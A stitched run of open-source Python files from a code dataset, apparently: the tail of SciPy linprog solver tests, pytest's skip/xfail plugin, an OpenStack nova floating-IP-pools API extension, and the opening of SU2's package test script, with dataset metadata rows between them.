res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[-2], desired_fun=0)
def test_bug_10124(self):
"""
Test for linprog docstring problem
'disp'=True caused revised simplex failure
"""
c = np.zeros(1)
A_ub = np.array([[1]])
b_ub = np.array([-2])
bounds = (None, None)
c = [-1, 4]
A_ub = [[-3, 1], [1, 2]]
b_ub = [6, 4]
bounds = [(None, None), (-3, None)]
o = {"disp": True}
o.update(self.options)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_success(res, desired_x=[10, -3], desired_fun=-22)
def test_bug_10349(self):
"""
Test for redundancy removal tolerance issue
https://github.com/scipy/scipy/issues/10349
"""
A_eq = np.array([[1, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1],
[1, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0],
[0, 1, 0, 0, 0, 1]])
b_eq = np.array([221, 210, 10, 141, 198, 102])
c = np.concatenate((0, 1, np.zeros(4)), axis=None)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[129, 92, 12, 198, 0, 10], desired_fun=92)
def test_bug_10466(self):
"""
Test that autoscale fixes poorly-scaled problem
"""
c = [-8., -0., -8., -0., -8., -0., -0., -0., -0., -0., -0., -0., -0.]
A_eq = [[1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 1., 0., 0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 1., 0., -1., 0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 1., 0., 0., 1., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0.],
[1., 0., 1., 0., 1., 0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0., 0., 0., 0., 1., 0.],
[0., 0., 1., 0., 1., 0., 0., 0., 0., 0., 0., 0., 1.]]
b_eq = [3.14572800e+08, 4.19430400e+08, 5.24288000e+08,
1.00663296e+09, 1.07374182e+09, 1.07374182e+09,
1.07374182e+09, 1.07374182e+09, 1.07374182e+09,
1.07374182e+09]
o = {"autoscale": True}
o.update(self.options)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "Solving system with option...")
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "scipy.linalg.solve\nIll...")
sup.filter(RuntimeWarning, "divide by zero encountered...")
sup.filter(RuntimeWarning, "overflow encountered...")
sup.filter(RuntimeWarning, "invalid value encountered...")
sup.filter(LinAlgWarning, "Ill-conditioned matrix...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
assert_allclose(res.fun, -8589934560)
#########################
# Method-specific Tests #
#########################
class LinprogSimplexTests(LinprogCommonTests):
method = "simplex"
class LinprogIPTests(LinprogCommonTests):
method = "interior-point"
class LinprogRSTests(LinprogCommonTests):
method = "revised simplex"
# Revised simplex does not reliably solve these problems.
# Failure is intermittent due to the random choice of elements to complete
# the basis after phase 1 terminates. In any case, linprog exists
# gracefully, reporting numerical difficulties. I do not think this should
# prevent revised simplex from being merged, as it solves the problems
# most of the time and solves a broader range of problems than the existing
# simplex implementation.
# I believe that the root cause is the same for all three and that this
# same issue prevents revised simplex from solving many other problems
# reliably. Somehow the pivoting rule allows the algorithm to pivot into
# a singular basis. I haven't been able to find a reference that
# acknowledges this possibility, suggesting that there is a bug. On the
# other hand, the pivoting rule is quite simple, and I can't find a
# mistake, which suggests that this is a possibility with the pivoting
# rule. Hopefully a better pivoting rule will fix the issue.
def test_bug_5400(self):
pytest.skip("Intermittent failure acceptable.")
def test_bug_8662(self):
pytest.skip("Intermittent failure acceptable.")
def test_network_flow(self):
pytest.skip("Intermittent failure acceptable.")
################################
# Simplex Option-Specific Tests#
################################
class TestLinprogSimplexDefault(LinprogSimplexTests):
def setup_method(self):
self.options = {}
def test_bug_5400(self):
with pytest.raises(ValueError):
super(TestLinprogSimplexDefault, self).test_bug_5400()
def test_bug_7237_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
# even if the solutuion is wrong, the appropriate error is raised.
self.options.update({'tol': 1e-12})
with pytest.raises(ValueError):
super(TestLinprogSimplexDefault, self).test_bug_7237()
def test_bug_8174_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
# even if the solutuion is wrong, the appropriate warning is issued.
self.options.update({'tol': 1e-12})
with pytest.warns(OptimizeWarning):
super(TestLinprogSimplexDefault, self).test_bug_8174()
class TestLinprogSimplexBland(LinprogSimplexTests):
def setup_method(self):
self.options = {'bland': True}
def test_bug_5400(self):
with pytest.raises(ValueError):
super(TestLinprogSimplexBland, self).test_bug_5400()
def test_bug_8174_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
# even if the solutuion is wrong, the appropriate error is raised.
self.options.update({'tol': 1e-12})
with pytest.raises(AssertionError):
with pytest.warns(OptimizeWarning):
super(TestLinprogSimplexBland, self).test_bug_8174()
class TestLinprogSimplexNoPresolve(LinprogSimplexTests):
def setup_method(self):
self.options = {'presolve': False}
is_32_bit = np.intp(0).itemsize < 8
is_linux = sys.platform.startswith('linux')
@pytest.mark.xfail(
condition=is_32_bit and is_linux,
reason='Fails with warning on 32-bit linux')
def test_bug_5400(self):
super(TestLinprogSimplexNoPresolve, self).test_bug_5400()
def test_bug_6139_low_tol(self):
# Linprog(method='simplex') fails to find a basic feasible solution
# if phase 1 pseudo-objective function is outside the provided tol.
# https://github.com/scipy/scipy/issues/6139
# Without ``presolve`` eliminating such rows the result is incorrect.
self.options.update({'tol': 1e-12})
with pytest.raises(ValueError):
return super(TestLinprogSimplexNoPresolve, self).test_bug_6139()
def test_bug_7237_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
# even if the solutuion is wrong, the appropriate error is raised.
self.options.update({'tol': 1e-12})
with pytest.raises(ValueError):
super(TestLinprogSimplexNoPresolve, self).test_bug_7237()
def test_bug_8174_low_tol(self):
# Fails if the tolerance is too strict. Here we test that
# even if the solutuion is wrong, the appropriate warning is issued.
self.options.update({'tol': 1e-12})
with pytest.warns(OptimizeWarning):
super(TestLinprogSimplexNoPresolve, self).test_bug_8174()
def test_unbounded_no_nontrivial_constraints_1(self):
pytest.skip("Tests behavior specific to presolve")
def test_unbounded_no_nontrivial_constraints_2(self):
pytest.skip("Tests behavior specific to presolve")
#######################################
# Interior-Point Option-Specific Tests#
#######################################
class TestLinprogIPDense(LinprogIPTests):
options = {"sparse": False}
if has_cholmod:
class TestLinprogIPSparseCholmod(LinprogIPTests):
options = {"sparse": True, "cholesky": True}
if has_umfpack:
class TestLinprogIPSparseUmfpack(LinprogIPTests):
options = {"sparse": True, "cholesky": False}
def test_bug_10466(self):
pytest.skip("Autoscale doesn't fix everything, and that's OK.")
class TestLinprogIPSparse(LinprogIPTests):
options = {"sparse": True, "cholesky": False, "sym_pos": False}
@pytest.mark.xfail(reason='Fails with ATLAS, see gh-7877')
def test_bug_6690(self):
# Test defined in base class, but can't mark as xfail there
super(TestLinprogIPSparse, self).test_bug_6690()
def test_magic_square_sparse_no_presolve(self):
# test linprog with a problem with a rank-deficient A_eq matrix
A_eq, b_eq, c, N = magic_square(3)
bounds = (0, 1)
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
sup.filter(OptimizeWarning, "Solving system with option...")
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_success(res, desired_fun=1.730550597)
def test_sparse_solve_options(self):
# checking that problem is solved with all column permutation options
A_eq, b_eq, c, N = magic_square(3)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(OptimizeWarning, "Invalid permc_spec option")
o = {key: self.options[key] for key in self.options}
permc_specs = ('NATURAL', 'MMD_ATA', 'MMD_AT_PLUS_A',
'COLAMD', 'ekki-ekki-ekki')
# 'ekki-ekki-ekki' raises warning about invalid permc_spec option
# and uses default
for permc_spec in permc_specs:
o["permc_spec"] = permc_spec
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_success(res, desired_fun=1.730550597)
class TestLinprogIPSparsePresolve(LinprogIPTests):
options = {"sparse": True, "_sparse_presolve": True}
def test_enzo_example_c_with_infeasibility(self):
pytest.skip('_sparse_presolve=True incompatible with presolve=False')
@pytest.mark.xfail(reason='Fails with ATLAS, see gh-7877')
def test_bug_6690(self):
# Test defined in base class, but can't mark as xfail there
super(TestLinprogIPSparsePresolve, self).test_bug_6690()
class TestLinprogIPSpecific(object):
method = "interior-point"
# the following tests don't need to be performed separately for
# sparse presolve, sparse after presolve, and dense
def test_solver_select(self):
# check that default solver is selected as expected
if has_cholmod:
options = {'sparse': True, 'cholesky': True}
elif has_umfpack:
options = {'sparse': True, 'cholesky': False}
else:
options = {'sparse': True, 'cholesky': False, 'sym_pos': False}
A, b, c = lpgen_2d(20, 20)
res1 = linprog(c, A_ub=A, b_ub=b, method=self.method, options=options)
res2 = linprog(c, A_ub=A, b_ub=b, method=self.method) # default solver
assert_allclose(res1.fun, res2.fun,
err_msg="linprog default solver unexpected result",
rtol=1e-15, atol=1e-15)
def test_unbounded_below_no_presolve_original(self):
# formerly caused segfault in TravisCI w/ "cholesky":True
c = [-1]
bounds = [(None, 1)]
res = linprog(c=c, bounds=bounds,
method=self.method,
options={"presolve": False, "cholesky": True})
_assert_success(res, desired_fun=-1)
def test_cholesky(self):
# use cholesky factorization and triangular solves
A, b, c = lpgen_2d(20, 20)
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"cholesky": True}) # only for dense
_assert_success(res, desired_fun=-64.049494229)
def test_alternate_initial_point(self):
# use "improved" initial point
A, b, c = lpgen_2d(20, 20)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "scipy.linalg.solve\nIll...")
sup.filter(OptimizeWarning, "Solving system with option...")
sup.filter(LinAlgWarning, "Ill-conditioned matrix...")
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"ip": True, "disp": True})
# ip code is independent of sparse/dense
_assert_success(res, desired_fun=-64.049494229)
def test_maxiter(self):
# test iteration limit
A, b, c = lpgen_2d(20, 20)
maxiter = np.random.randint(6) + 1 # problem takes 7 iterations
res = linprog(c, A_ub=A, b_ub=b, method=self.method,
options={"maxiter": maxiter})
# maxiter is independent of sparse/dense
_assert_iteration_limit_reached(res, maxiter)
assert_equal(res.nit, maxiter)
def test_bug_8664(self):
# interior-point has trouble with this when presolve is off
c = [4]
A_ub = [[2], [5]]
b_ub = [4, 4]
A_eq = [[0], [-8], [9]]
b_eq = [3, 2, 10]
with suppress_warnings() as sup:
sup.filter(RuntimeWarning)
sup.filter(OptimizeWarning, "Solving system with option...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options={"presolve": False})
assert_(not res.success, "Incorrectly reported success")
########################################
# Revised Simplex Option-Specific Tests#
########################################
class TestLinprogRSCommon(LinprogRSTests):
options = {}
def test_cyclic_bland(self):
pytest.skip("Intermittent failure acceptable.")
def test_nontrivial_problem_with_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_unbounded_variables(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bounds = [(None, None), (None, None), (0, None), (None, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_bounded_variables(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bounds = [(None, 1), (1, None), (0, None), (.4, .6)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_negative_unbounded_variable(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
b_eq = [4]
x_star = np.array([-219/385, 582/385, 0, 4/10])
f_star = 3951/385
bounds = [(None, None), (1, None), (0, None), (.4, .6)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_bad_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bad_guess = [1, 2, 3, .5]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=bad_guess)
assert_equal(res.status, 6)
def test_redundant_constraints_with_guess(self):
A, b, c, N = magic_square(3)
p = np.random.rand(*c.shape)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_eq=A, b_eq=b, method=self.method)
res2 = linprog(c, A_eq=A, b_eq=b, method=self.method, x0=res.x)
res3 = linprog(c + p, A_eq=A, b_eq=b, method=self.method, x0=res.x)
_assert_success(res2, desired_fun=1.730550597)
assert_equal(res2.nit, 0)
_assert_success(res3)
assert_(res3.nit < res.nit) # hot start reduces iterations
class TestLinprogRSBland(LinprogRSTests):
options = {"pivot": "bland"}
###########################
# Autoscale-Specific Tests#
###########################
class AutoscaleTests(object):
options = {"autoscale": True}
test_bug_6139 = LinprogCommonTests.test_bug_6139
test_bug_6690 = LinprogCommonTests.test_bug_6690
test_bug_7237 = LinprogCommonTests.test_bug_7237
class TestAutoscaleIP(AutoscaleTests):
method = "interior-point"
def test_bug_6139(self):
self.options['tol'] = 1e-10
return AutoscaleTests.test_bug_6139(self)
class TestAutoscaleSimplex(AutoscaleTests):
method = "simplex"
class TestAutoscaleRS(AutoscaleTests):
method = "revised simplex"
def test_nontrivial_problem_with_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=x_star)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
assert_equal(res.nit, 0)
def test_nontrivial_problem_with_bad_guess(self):
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
bad_guess = [1, 2, 3, .5]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options, x0=bad_guess)
assert_equal(res.status, 6)
| bsd-3-clause | 3,454,162,632,432,896,000 | 38.471388 | 98 | 0.517706 | false |
Syrcon/servo | tests/wpt/web-platform-tests/tools/pytest/_pytest/skipping.py | 168 | 12742 | """ support for skip/xfail functions and markers. """
import os
import sys
import traceback
import py
import pytest
from _pytest.mark import MarkInfo, MarkDecorator
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--runxfail',
action="store_true", dest="runxfail", default=False,
help="run tests even if they are marked xfail")
parser.addini("xfail_strict", "default for the strict parameter of xfail "
"markers when not given explicitly (default: "
"False)",
default=False,
type="bool")
def pytest_configure(config):
if config.option.runxfail:
old = pytest.xfail
config._cleanup.append(lambda: setattr(pytest, "xfail", old))
def nop(*args, **kwargs):
pass
nop.Exception = XFailed
setattr(pytest, "xfail", nop)
config.addinivalue_line("markers",
"skipif(condition): skip the given test function if eval(condition) "
"results in a True value. Evaluation happens within the "
"module global context. Example: skipif('sys.platform == \"win32\"') "
"skips the test if we are on the win32 platform. see "
"http://pytest.org/latest/skipping.html"
)
config.addinivalue_line("markers",
"xfail(condition, reason=None, run=True, raises=None): mark the the test function "
"as an expected failure if eval(condition) has a True value. "
"Optionally specify a reason for better reporting and run=False if "
"you don't even want to execute the test function. If only specific "
"exception(s) are expected, you can list them in raises, and if the test fails "
"in other ways, it will be reported as a true failure. "
"See http://pytest.org/latest/skipping.html"
)
def pytest_namespace():
return dict(xfail=xfail)
class XFailed(pytest.fail.Exception):
""" raised from an explicit call to pytest.xfail() """
def xfail(reason=""):
""" xfail an executing test or setup functions with the given reason."""
__tracebackhide__ = True
raise XFailed(reason)
xfail.Exception = XFailed
class MarkEvaluator:
def __init__(self, item, name):
self.item = item
self.name = name
@property
def holder(self):
return self.item.keywords.get(self.name)
def __bool__(self):
return bool(self.holder)
__nonzero__ = __bool__
def wasvalid(self):
return not hasattr(self, 'exc')
def invalidraise(self, exc):
raises = self.get('raises')
if not raises:
return
return not isinstance(exc, raises)
def istrue(self):
try:
return self._istrue()
except Exception:
self.exc = sys.exc_info()
if isinstance(self.exc[1], SyntaxError):
msg = [" " * (self.exc[1].offset + 4) + "^",]
msg.append("SyntaxError: invalid syntax")
else:
msg = traceback.format_exception_only(*self.exc[:2])
pytest.fail("Error evaluating %r expression\n"
" %s\n"
"%s"
%(self.name, self.expr, "\n".join(msg)),
pytrace=False)
def _getglobals(self):
d = {'os': os, 'sys': sys, 'config': self.item.config}
func = self.item.obj
try:
d.update(func.__globals__)
except AttributeError:
d.update(func.func_globals)
return d
def _istrue(self):
if hasattr(self, 'result'):
return self.result
if self.holder:
d = self._getglobals()
if self.holder.args:
self.result = False
# "holder" might be a MarkInfo or a MarkDecorator; only
# MarkInfo keeps track of all parameters it received in an
# _arglist attribute
if hasattr(self.holder, '_arglist'):
arglist = self.holder._arglist
else:
arglist = [(self.holder.args, self.holder.kwargs)]
for args, kwargs in arglist:
for expr in args:
self.expr = expr
if isinstance(expr, py.builtin._basestring):
result = cached_eval(self.item.config, expr, d)
else:
if "reason" not in kwargs:
# XXX better be checked at collection time
msg = "you need to specify reason=STRING " \
"when using booleans as conditions."
pytest.fail(msg)
result = bool(expr)
if result:
self.result = True
self.reason = kwargs.get('reason', None)
self.expr = expr
return self.result
else:
self.result = True
return getattr(self, 'result', False)
def get(self, attr, default=None):
return self.holder.kwargs.get(attr, default)
def getexplanation(self):
expl = getattr(self, 'reason', None) or self.get('reason', None)
if not expl:
if not hasattr(self, 'expr'):
return ""
else:
return "condition: " + str(self.expr)
return expl
@pytest.hookimpl(tryfirst=True)
def pytest_runtest_setup(item):
# Check if skip or skipif are specified as pytest marks
skipif_info = item.keywords.get('skipif')
if isinstance(skipif_info, (MarkInfo, MarkDecorator)):
eval_skipif = MarkEvaluator(item, 'skipif')
if eval_skipif.istrue():
item._evalskip = eval_skipif
pytest.skip(eval_skipif.getexplanation())
skip_info = item.keywords.get('skip')
if isinstance(skip_info, (MarkInfo, MarkDecorator)):
item._evalskip = True
if 'reason' in skip_info.kwargs:
pytest.skip(skip_info.kwargs['reason'])
elif skip_info.args:
pytest.skip(skip_info.args[0])
else:
pytest.skip("unconditional skip")
item._evalxfail = MarkEvaluator(item, 'xfail')
check_xfail_no_run(item)
@pytest.mark.hookwrapper
def pytest_pyfunc_call(pyfuncitem):
check_xfail_no_run(pyfuncitem)
outcome = yield
passed = outcome.excinfo is None
if passed:
check_strict_xfail(pyfuncitem)
def check_xfail_no_run(item):
"""check xfail(run=False)"""
if not item.config.option.runxfail:
evalxfail = item._evalxfail
if evalxfail.istrue():
if not evalxfail.get('run', True):
pytest.xfail("[NOTRUN] " + evalxfail.getexplanation())
def check_strict_xfail(pyfuncitem):
"""check xfail(strict=True) for the given PASSING test"""
evalxfail = pyfuncitem._evalxfail
if evalxfail.istrue():
strict_default = pyfuncitem.config.getini('xfail_strict')
is_strict_xfail = evalxfail.get('strict', strict_default)
if is_strict_xfail:
del pyfuncitem._evalxfail
explanation = evalxfail.getexplanation()
pytest.fail('[XPASS(strict)] ' + explanation, pytrace=False)
@pytest.hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item, call):
outcome = yield
rep = outcome.get_result()
evalxfail = getattr(item, '_evalxfail', None)
evalskip = getattr(item, '_evalskip', None)
# unitttest special case, see setting of _unexpectedsuccess
if hasattr(item, '_unexpectedsuccess') and rep.when == "call":
# we need to translate into how pytest encodes xpass
rep.wasxfail = "reason: " + repr(item._unexpectedsuccess)
rep.outcome = "failed"
elif item.config.option.runxfail:
pass # don't interefere
elif call.excinfo and call.excinfo.errisinstance(pytest.xfail.Exception):
rep.wasxfail = "reason: " + call.excinfo.value.msg
rep.outcome = "skipped"
elif evalxfail and not rep.skipped and evalxfail.wasvalid() and \
evalxfail.istrue():
if call.excinfo:
if evalxfail.invalidraise(call.excinfo.value):
rep.outcome = "failed"
else:
rep.outcome = "skipped"
rep.wasxfail = evalxfail.getexplanation()
elif call.when == "call":
rep.outcome = "failed" # xpass outcome
rep.wasxfail = evalxfail.getexplanation()
elif evalskip is not None and rep.skipped and type(rep.longrepr) is tuple:
# skipped by mark.skipif; change the location of the failure
# to point to the item definition, otherwise it will display
# the location of where the skip exception was raised within pytest
filename, line, reason = rep.longrepr
filename, line = item.location[:2]
rep.longrepr = filename, line, reason
# called by terminalreporter progress reporting
def pytest_report_teststatus(report):
if hasattr(report, "wasxfail"):
if report.skipped:
return "xfailed", "x", "xfail"
elif report.failed:
return "xpassed", "X", ("XPASS", {'yellow': True})
# called by the terminalreporter instance/plugin
def pytest_terminal_summary(terminalreporter):
tr = terminalreporter
if not tr.reportchars:
#for name in "xfailed skipped failed xpassed":
# if not tr.stats.get(name, 0):
# tr.write_line("HINT: use '-r' option to see extra "
# "summary info about tests")
# break
return
lines = []
for char in tr.reportchars:
if char == "x":
show_xfailed(terminalreporter, lines)
elif char == "X":
show_xpassed(terminalreporter, lines)
elif char in "fF":
show_simple(terminalreporter, lines, 'failed', "FAIL %s")
elif char in "sS":
show_skipped(terminalreporter, lines)
elif char == "E":
show_simple(terminalreporter, lines, 'error', "ERROR %s")
elif char == 'p':
show_simple(terminalreporter, lines, 'passed', "PASSED %s")
if lines:
tr._tw.sep("=", "short test summary info")
for line in lines:
tr._tw.line(line)
def show_simple(terminalreporter, lines, stat, format):
failed = terminalreporter.stats.get(stat)
if failed:
for rep in failed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
lines.append(format %(pos,))
def show_xfailed(terminalreporter, lines):
xfailed = terminalreporter.stats.get("xfailed")
if xfailed:
for rep in xfailed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XFAIL %s" % (pos,))
if reason:
lines.append(" " + str(reason))
def show_xpassed(terminalreporter, lines):
xpassed = terminalreporter.stats.get("xpassed")
if xpassed:
for rep in xpassed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XPASS %s %s" %(pos, reason))
def cached_eval(config, expr, d):
if not hasattr(config, '_evalcache'):
config._evalcache = {}
try:
return config._evalcache[expr]
except KeyError:
import _pytest._code
exprcode = _pytest._code.compile(expr, mode="eval")
config._evalcache[expr] = x = eval(exprcode, d)
return x
def folded_skips(skipped):
d = {}
for event in skipped:
key = event.longrepr
assert len(key) == 3, (event, key)
d.setdefault(key, []).append(event)
l = []
for key, events in d.items():
l.append((len(events),) + key)
return l
def show_skipped(terminalreporter, lines):
tr = terminalreporter
skipped = tr.stats.get('skipped', [])
if skipped:
#if not tr.hasopt('skipped'):
# tr.write_line(
# "%d skipped tests, specify -rs for more info" %
# len(skipped))
# return
fskips = folded_skips(skipped)
if fskips:
#tr.write_sep("_", "skipped test summary")
for num, fspath, lineno, reason in fskips:
if reason.startswith("Skipped: "):
reason = reason[9:]
lines.append("SKIP [%d] %s:%d: %s" %
(num, fspath, lineno, reason))
| mpl-2.0 | -278,946,424,704,177,280 | 34.99435 | 91 | 0.571574 | false |
mmnelemane/nova | nova/api/openstack/compute/legacy_v2/contrib/floating_ip_pools.py | 79 | 2131 | # Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import extensions
from nova import network
authorize = extensions.extension_authorizer('compute', 'floating_ip_pools')
def _translate_floating_ip_view(pool_name):
return {
'name': pool_name,
}
def _translate_floating_ip_pools_view(pools):
return {
'floating_ip_pools': [_translate_floating_ip_view(pool_name)
for pool_name in pools]
}
class FloatingIPPoolsController(object):
"""The Floating IP Pool API controller for the OpenStack API."""
def __init__(self):
self.network_api = network.API()
super(FloatingIPPoolsController, self).__init__()
def index(self, req):
"""Return a list of pools."""
context = req.environ['nova.context']
authorize(context)
pools = self.network_api.get_floating_ip_pools(context)
return _translate_floating_ip_pools_view(pools)
class Floating_ip_pools(extensions.ExtensionDescriptor):
"""Floating IPs support."""
name = "FloatingIpPools"
alias = "os-floating-ip-pools"
namespace = ("http://docs.openstack.org/compute/ext/"
"floating_ip_pools/api/v1.1")
updated = "2012-01-04T00:00:00Z"
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-floating-ip-pools',
FloatingIPPoolsController(),
member_actions={})
resources.append(res)
return resources
| apache-2.0 | 3,354,623,288,483,381,000 | 30.80597 | 78 | 0.652276 | false |
EduardoMolina/SU2 | SU2_PY/package_tests.py | 1 | 9332 | #!/usr/bin/env python
## \file package_tests.py
# \brief _____________.
# \author T. Lukaczyk
# \version 7.0.3 "Blackbird"
#
# SU2 Project Website: https://su2code.github.io
#
# The SU2 Project is maintained by the SU2 Foundation
# (http://su2foundation.org)
#
# Copyright 2012-2020, SU2 Contributors (cf. AUTHORS.md)
#
# SU2 is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SU2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SU2. If not, see <http://www.gnu.org/licenses/>.
# make print(*args) function available in PY2.6+, does'nt work on PY < 2.6
from __future__ import print_function
import os, sys, copy
sys.path.append(os.environ['SU2_RUN'])
import SU2
from collections import OrderedDict
# todo:
# verify command line interface
# commenting
# verify optimization, gradients, flow solutions
# verbosity
# plotting
# verbose redirection
# pyopt optimizers
# needed config options
# OPT_CONSTRAINT
# OPT_OBJECTIVE
# CONSOLE
# OUTPUT_WEIGHT
# FINDIFF_STEP
# DOT_FINDIFF_STEP
# GRADIENT_METHOD= FINITE_DIFFERENCING, CONTINUOUS_ADJOINT, DISCRETE_ADJOINT
# ADAPTATION= DIRECT, ADJOINT
def main():
#io0() # working
#io1()
#level0() # working
#level1() # working
#level2() # working
#level3() # working
#level4() # working
#level5() # working
mesh0()
print('DONE!')
def io0():
folder='test_io0'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(filename=config_name)
print(config)
config.ADAPT_CYCLES
config['ADAPT_CYCLES']
config.dump('out.cfg')
konfig = copy.deepcopy(config)
konfig['TASKS'] = ['TEST']
konfig['NUMBER_PART'] = 0
config_diff = config.diff(konfig)
print(config_diff)
wait = 0
def io1():
option = SU2.io.config.MathProblem()
option = 'DIRECT'
wait = 0
def level0():
folder='test_level0'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config.EXT_ITER = 9
config.NUMBER_PART = 2
SU2.run.CFD(config)
def level1():
folder='test_level1'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
state = SU2.io.State()
# Deformation
dv_new = [0.002]*38
info = SU2.run.deform(config,dv_new)
state.update(info)
# Direct Solution
info = SU2.run.direct(config)
state.update(info)
SU2.io.restart2solution(config,state)
# Adjoint Solution
info = SU2.run.adjoint(config)
state.update(info)
SU2.io.restart2solution(config,state)
# Gradient Projection
info = SU2.run.projection(config)
state.update(info)
print(state)
SU2.io.save_data('state.pkl',state)
data = SU2.io.load_data('state.pkl')
SU2.io.save_data('config.pkl',config)
data = SU2.io.load_data('config.pkl')
wait = 0
def level2():
folder='test_level2'; pull='config_NACA0012.cfg'; link='mesh_NACA0012.su2'
with SU2.io.redirect_folder(folder,pull,link):
# Setup
config_name = 'config_NACA0012.cfg'
config = SU2.io.Config(config_name)
config['NUMBER_PART'] = 2
config['EXT_ITER'] = 9
dv_new = [0.0]*38
#dv_new[10] = 0.05
config.unpack_dvs(dv_new)
state = SU2.io.State()
#with SU2.io.redirect.folder(folder='JOB_001',link='mesh_NACA0012.su2'):
# grad = SU2.eval.grad( 'DRAG', 'FINDIFF', config, state )
